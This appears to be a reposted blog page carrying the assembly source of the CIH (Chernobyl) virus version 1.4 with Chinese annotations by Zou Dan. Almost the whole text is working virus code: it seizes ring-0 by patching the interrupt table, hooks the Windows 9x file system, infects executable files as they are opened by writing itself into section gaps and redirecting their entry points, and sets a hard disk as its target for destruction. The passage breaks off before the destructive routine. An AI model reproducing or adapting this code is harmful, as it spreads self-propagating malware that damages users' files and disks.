CIH病毒-邹丹注释
生活随笔
收集整理的這篇文章主要介紹了
CIH病毒-邹丹注释
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
;CIH病毒1.4版本之中文注釋由"鄒丹"編寫完成于1999-4-09
;源程序中的英文注釋未作修改,全部保留 .586P ;586保護模式匯編
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT FileHeader: ;編譯連接后的PE格式可執行文件文件頭 db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; ****************************************************************************
; * My Virus Game *
; **************************************************************************** ; *********************************************************
; * Constant Define *
; ********************************************************* TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1 ;主版本號
MinorVirusVersion = 4 ;副版本號
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本號 IF DEBUG ;是否是調試用 FirstKillHardDiskNumber = 81h ;殺掉第二個硬盤“d:” HookExceptionNumber = 05h ;使用5號中斷
ELSE FirstKillHardDiskNumber = 80h ;殺掉第一個硬盤“c:” HookExceptionNumber = 03h ;使用3號中斷
ENDIF FileNameBufferSize = 7fh ; *********************************************************
; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; *********************************************************
; * Ring3 Virus Game Initial Program *
; ********************************************************* MyVirusStart: push ebp ; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0
@0: pop ebx ;獲取程序起始偏移量? ;用此偏移量+相對偏移量獲得絕對地址(病毒程序大量用到) lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address ?;獲得中斷描述符表的基址到ebx pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;計算要用中斷的基址到ebx cli ;在改表項前關中斷? mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point ?;取得中斷基址到ebp lea esi, MyExceptionHook-@1[ecx] push esi ?;esi為病毒中斷例程地址 mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address;修改中斷基址使指向病毒中斷例程 pop esi ; *************************************
; * Generate Exception to Get Ring0 *
; ************************************* int HookExceptionNumber ; GenerateException;以中斷的方式進入0級
ReturnAddressOfEndException = $ ; *************************************
; * Merge All Virus Code Section *
; ************************************* push esi mov esi, eax ;esi指向病毒開始處 LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb ;拷貝病毒代碼到分配好的系統內存首址 sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷貝結束 jmp LoopOfMergeAllVirusCodeSection ;拷貝下一段 QuitLoopOfMergeAllVirusCodeSection: pop esi ; *************************************
; * Generate Exception Again *
; ************************************* int HookExceptionNumber ; GenerateException Aga ;再一次進入0級 ; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; ************************************* ReadyRestoreSE: sti ;開中斷 xor ebx, ebx jmp RestoreSE ; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; ************************************* StopToRunVirusCode:
@1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; *************************************
; * Return Original App to Execute *
; ************************************* pop ebp push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ;把原程序的開始地址壓棧 ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的開始處 ; *********************************************************
; * Ring0 Virus Game Initial Program *
; ********************************************************* MyExceptionHook:
@2 = MyExceptionHook jz InstallMyFileSystemApiHook ;如果病毒代碼已拷貝好了 ;轉到安裝文件系統鉤子的程序
; *************************************
; * Do My Virus Exist in System !? *
; ************************************* mov ecx, dr0 ;察看dr0是否設置過(dr0為病毒駐留標志) jecxz AllocateSystemMemoryPage ;沒有設置,則分配系統內存 add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; *************************************
; * Return to Ring3 Initial Program *
; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; ;恢復原來的中斷基址 iretd ;中斷返回 ; *************************************
; * Allocate SystemMemory Page to Use *
; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System ;設置dr0,它是病毒駐留的標志 push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ;調用方法ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, ;ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr,;ULONG flags); push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate;VXD調用
_PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h ;恢復棧指針 xchg edi, eax ; EDI = SystemMemory Start Address ; EDI指向分配好的系統內存首址 lea eax, MyVirusStart-@2[esi] ;eax指向病毒開始處 iretd ; Return to Ring3 Initial Program ;退出中斷,回3級(回到"Merge All Virus Code Section") ; *************************************
; * Install My File System Api Hook *
; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] ;指向文件系統鉤子程序首址 push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags ;在調用后變為call [IFSMgr_InstallFileSystemApiHook] mov dr0, eax ; Save OldFileSystemApiHook Address ;保存原來的文件系統鉤子程序首址到dr0(改調用的返回值是前一個鏈值) pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] ;edx為IFSMgr_InstallFileSystemApiHook功能的地址 mov OldInstallFileSystemApiHook-@3[eax], edx ?;保存 ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax ?;設置新的IFSMgr_InstallFileSystemApiHook功能調用的地址 ;使指向InstallFileSystemApiHook cli jmp ExitRing0Init ?;退出0級(int 3 or int 5) ; *********************************************************
; * Code Size of Merge Virus Code Section *
; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; ********************************************************* InstallFileSystemApiHook: ;新的IFSMgr_InstallFileSystemApiHook功能調用 push ebx call @4 ;
@4: ; pop ebx ; mov ebx, offset FileSystemApiHook ;獲得當前指令的偏移地址 add ebx, FileSystemApiHook-@4 ;加上偏移的差=FileSystemApiHook的偏移 push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook ;調用VXD移去指向FileSystemApiHook的鉤子
IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags ;調用號 pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] ;調用原來的IFSMgr_InstallFileSystemApiHook功能設置鉤子 pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] ;調用原來的IFSMgr_InstallFileSystemApiHook功能設置鉤子 pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address ;調整原來的地址 pop eax pop ebx ret ; *********************************************************
; * Static Data *
; ********************************************************* OldInstallFileSystemApiHook dd ? ;原來的InstallFileSystemApiHook調用的地址 ; *********************************************************
; * IFSMgr_FileSystemHook *
; ********************************************************* ; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; ************************************* FileSystemApiHook: ;安裝好的文件系統鉤子
@3 = FileSystemApiHook pushad ;保存寄存器(20h長) call @5 ;
@5: ; pop esi ; mov esi, offset ;esi為當前指令的偏移 add esi, VirusGameDataStartAddress-@5 ;esi為FileSystemApiHook的偏移加上到VirusGameDataStartAddress的偏移之差=VirusGameDataStartAddress的偏移; *************************************
; * Is OnBusy !? *
; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) ;測試"忙"標志jnz pIFSFunc ; goto pIFSFunc ;"忙"則轉到pIFSFunc; *************************************
; * Is OpenFile !? *
; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] ;ebx為FunctionNum的地址
;文件系統鉤子的調用格式如下
;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,int ResourceFlags, int CodePage, pioreq pir);助標2 cmp dword ptr [ebx], 00000024h ;測試此次調用是否是為了打開文件;在DDK的ifs.h中定義的#define IFSFN_OPEN 36 jne prevhook ;不是就跳到前一個文件鉤子去 ; *************************************
; * Enable OnBusy *
; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;設置"忙"標志為"忙" ; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 ;esi指向FileNameBuffer push esi ;保存之 mov al, [ebx+04h] ;ebx+4為int Drive的地址 cmp al, 0ffh ;是否是UNC(universal naming conventions)地址 je CallUniToBCSPath ;是就轉 add al, 40h mov ah, ':' mov [esi], eax ;處理成"X:"的形式 inc esi inc esi ; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname * ;把Canonicalized Unicode的字符轉換為普通的BCS字符集
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
;調用方法 UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath, unsigned int maxLength, int charSet)CallUniToBCSPath: push 00000000h ;字符集 push FileNameBufferSize ;字符長度 mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax ;Uni字符首址 push esi ;BCS字符首址 int 20h ; VXDCall UniToBCSPath ;調用UniToBCSPath
UniToBCSPath = $ dd 00400041h ;調用id add esp, 04h*04h ; *************************************
; * Is FileName '.EXE' !? *
; ************************************* ; cmp [esi+eax-04h], '.EXE' cmp [esi+eax-04h], 'EXE.' ;測試是否是*.EXE(可執行)文件 pop esi jne DisableOnBusy IF DEBUG ; *************************************
; * Only for Debug *
; ************************************* ; cmp [esi+eax-06h], 'FUCK' cmp [esi+eax-06h], 'KCUF' ;如果是測試用途則測試是否是"FUCK.EXE" jne DisableOnBusy ENDIF ; *************************************
; * Is Open Existing File !? *
; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h ;測試是否打開 jne DisableOnBusy ; *************************************
; * Get Attributes of the File *
; ************************************* mov ax, 4300h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(R0_FILEATTRIBUTES/GET_ATTRIBUTES) int 20h ; VXDCall IFSMgr_Ring0_FileIO ;調用IFSMgr_Ring0_FileIO的獲得文件屬性的功能
IFSMgr_Ring0_FileIO = $ dd 00400032h ;調用號 jc DisableOnBusy ;失敗否? push ecx ; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ;獲得IFSMgr_Ring0_FileIO調用的地址 ; *************************************
; * Is Read-Only File !? *
; ************************************* test cl, 01h jz OpenFile ;測試是否是只讀文件 ; *************************************
; * Modify Read-Only File to Write *
; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(R0_FILEATTRIBUTES/SET_ATTRIBUTES ) xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ;調用IFSMgr_Ring0_FileIO的改文件屬性功能,使文件可寫; *************************************
; * Open File *
; ************************************* OpenFile: xor eax, eax mov ah, 0d5h ;IFSMgr_Ring0_FileIO的打開文件功能號(R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT)xor ecx, ecx ;文件屬性 xor edx, edx inc edx mov ebx, edx inc ebx ;esi為文件名首址 call edi ; VXDCall IFSMgr_Ring0_FileIO ;調用IFSMgr_Ring0_FileIO的打開文件功能 xchg ebx, eax ; mov ebx, FileHandle ;在ebx中保存文件句柄 ; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ;是否需要恢復文件屬性(有寫屬性就不需要恢復了) ; *************************************
; * Restore Attributes of the File *
; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(R0_FILEATTRIBUTES/SET_ATTRIBUTES) call edi ; VXDCall IFSMgr_Ring0_FileIO ;恢復文件屬性 ; *************************************
; * Is Open File OK !? *
; ************************************* IsOpenFileOK: popf jc DisableOnBusy ;打開是否成功? ; *************************************
; * Open File Already Succeed. ^__^ *
; ************************************* push esi ; Push FileNameBuffer Address to Stack ;把文件名數據區首址壓棧 pushf ; Now CF = 0, Push Flag to Stack ;保存標志位 add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ;esi指向數據區首址 ; ***************************
; * Get OffsetToNewHeader *
; *************************** xor eax, eax mov ah, 0d6h ;IFSMgr_Ring0_FileIO的讀文件功能號(R0_READFILE) ; For Doing Minimal VirusCode's Length, ; I Save EAX to EBP. mov ebp, eax push 00000004h ;讀取4個字節 pop ecx push 0000003ch ;讀取dos文件頭偏移3ch處的Windows文件頭首部偏移 pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀文件到esi mov edx, [esi] ;Windows文件頭首部偏移放到edx ; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; *************************** dec edx mov eax, ebp ;功能號 call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀文件到esi ; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; *************************** ; cmp [esi], '\0PE\0' cmp dword ptr [esi], 00455000h ;判斷是否是PE文件(標志"PE\0\0") jne CloseFile ;不是就關閉文件 ; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; ************************************* ; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; ************************************* push ebx ; Save File Handle ;保存文件句柄 push 00h ; Set VirusCodeSectionTableEndMark ; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; *************************** push 01h ; Size push edx ; Pointer of File ;edx指向PE文件頭偏移00h push edi ; Address of Buffer ;edi為IFSMgr_Ring0_FileIO的地址(原注釋有誤) ; ***************************
; * Save ESP Register *
; *************************** mov dr1, esp ; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; *************************** push eax ; Size ; ***************************
; * Let's Read *
; * Image Header in File *
; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead ;要讀2個字節(WORD NumberOfSections) add edx, 07h ; Move EDX to NumberOfSections ;PE文件頭+07h為NumberOfSections(塊個數) call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀出NumberOfSections(塊個數)到esi ; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ;edx為SectionTable的偏移 ; ***************************
; * Let's Get *
; * Total Size of Sections *
; *************************** mov al, SizeOfScetionTable ;每個塊表項(ScetionTable)的大小(字節) ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ;每個塊表項乘以塊個數=塊表大小 ; ***************************
; * Let's Set Section Table *
; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] ;esi指向塊表首址(在病毒動態數據區中) push eax ; Size ;塊表大小 push edx ; Pointer of File ;edx為SectionTable的偏移 push esi ; Address of Buffer ; ; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h ;*8 push ecx ; Save TotalSizeOfVirusCodeSectionTable ;預留病毒塊表空間 add ecx, eax add ecx, edx ;ecx+文件的正文的偏移 sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ;求補 ;ecx為文件頭大小-正文的偏移=未用空間 ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table ;ecx為塊表大小 ; Save Original Address of Entry Point mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址 add eax, (ImageBase-@9)[esi] ;裝入基址 mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存裝入后實際的入口地址 cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空間和病毒第一塊大小比較jl OnlySetInfectedMark ;小于就只設感染標志; ***************************
; * Read All Section Tables *
; *************************** mov eax, ebp ;讀的功能號 call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀塊表到esi(@9處) ; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; *************************** xchg eax, ebp push 00000004h pop ecx ;讀4字節 push edx mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx為第二塊的偏移(.rdata) add edx, 12h ;加10h+2h(10h處為"WinZip....") call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀4字節到esi ; cmp [esi], 'nZip' cmp dword ptr [esi], 'piZn' ;判斷是否是WinZip自解壓文件 je NotSetInfectedMark ;是就不設置感染標志 pop edx ;edx指向塊表在文件中首址 ; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx ; 未用空間大小 pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, ebp ; ebp為塊表大小 push edx ; Pointer of File ;指向塊表后(第一塊) add ebp, esi ; ebp指向病毒數據區的塊表后(第一塊) push ebp ; Address of Buffer ; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; *************************** lea eax, [ebp+edi-04h] mov [eax], ebx ;設置病毒代碼第一塊的大小(未用空間大小)到病毒塊表 ; ***************************
; * Let's Set My Virus *
; * First Section Code *
; *************************** push ebx ; Size ;病毒代碼第一塊的大小(未用空間大小) add edx, edi push edx ; Pointer of File ;指向塊表后(第一塊)+Size??=病毒正文(病毒開始處) lea edi, (MyVirusStart-@9)[esi] push edi ; Address of Buffer ;指向病毒開始處 ; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文) ; ***************************
; * Setup Initial Data *
; *************************** lea edx, [esi-SizeOfScetionTable] ;edx先減一項塊表長度,以配合下面的"助標1"mov ebp, offset VirusSize ;ebp為病毒長度 jmp StartToWriteCodeToSections ; ***************************
; * Write Code to Sections *
; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable ;助標1: ;指向下一塊表項 mov ebx, (SizeOfRawData-@9)[edx] ;ebx為該塊表項的SizeOfRawData(塊大小) sub ebx, (VirtualSize-@9)[edx] ;減去VirtualSize=該塊未用空間 jbe EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx ;寫入病毒塊表 mov ebx, (PointerToRawData-@9)[edx] ;ebx為塊的物理(實際)偏移? add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize push ebx ; Pointer of File ;ebx指向該塊未用空間的文件指針 push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] ;ebx為該塊裝入后的實際地址 mov [eax+4], ebx ;保存到病毒塊表中 mov ebx, [eax] ;該塊未用空間大小 add (VirtualSize-@9)[edx], ebx ;加到該塊表項的VirtualSize; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h ;改該塊表項的塊屬性(改為可讀,并包含初始化數據) StartToWriteCodeToSections: sub ebp, ebx ;病毒大小-病毒塊大小 jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完畢)就設置病毒塊表結束符add edi, ebx ; Move Address of Buffer ;指向病毒下一塊 EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; ***************************
; * Only Set Infected Mark *
; *************************** OnlySetInfectedMark: mov esp, dr1 ;只設置感染標志 jmp WriteVirusCodeToFile ;跳到寫病毒到要傳染的文件的程序 ; ***************************
; * Not Set Infected Mark *
; *************************** NotSetInfectedMark: add esp, 3ch ;不設置感染標志 jmp CloseFile ;跳到關文件 ; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp ;更正病毒塊表的最后一項 add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ;設置塊表結束標志 ; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] ;上一個調用VXD的指令的地址 mov cl, VxDCallTableSize ;所用VXD調用的個數 LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh ;還原成"int 20h"的形式 mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] ;從VxDCallIDTable取出VXD調用的id號放到edxmov [eax+2], edx ;放到"int 20h"的后面,形成'int 20h' and the 'Service Identifier'的形式movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] ;VxDCallAddressTable中放著各個調用VXD的指令的地址之差sub eax, edx ;eax為上一個調用地址 loop LoopOfRestoreVxDCallID ;還原其他的調用 ; ***************************
; * Let's Write *
; * Virus Code to the File *
; *************************** WriteVirusCodeToFile: mov eax, dr1 ;dr1為前面所保存的esp mov ebx, [eax+10h] ;ebx為保存在棧中的保存文件句柄mov edi, [eax] ;edi為保存在棧中的IFSMgr_Ring0_FileIO調用的地址LoopOfWriteVirusCodeToFile: pop ecx ;病毒代碼各段的偏移 jecxz SetFileModificationMark ;到病毒偏移零為止 mov esi, ecx mov eax, 0d601h ;寫文件功能號(R0_WRITEFILE) pop edx ;文件指針 pop ecx ;要寫的字節數call edi ; VXDCall IFSMgr_Ring0_FileIO ;寫文件 ;依次寫入:各段病毒代碼,病毒塊表,新的文件塊表,新的程序入口,感染標志 jmp LoopOfWriteVirusCodeToFile ; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) ;設置進位標志 pushf ;標志位壓棧 ; *************************************
; * Close File *
; ************************************* CloseFile: xor eax, eax mov ah, 0d7h ;關閉文件功能號 call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************************
; * Need to Restore File Modification *
; * Time !? *
; ************************************* popf pop esi jnc IsKillComputer ;CF=0就KillComputer :-( ; *************************************
; * Restore File Modification Time *
; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ;修改文件修改時間 ; *************************************
; * Disable OnBusy *
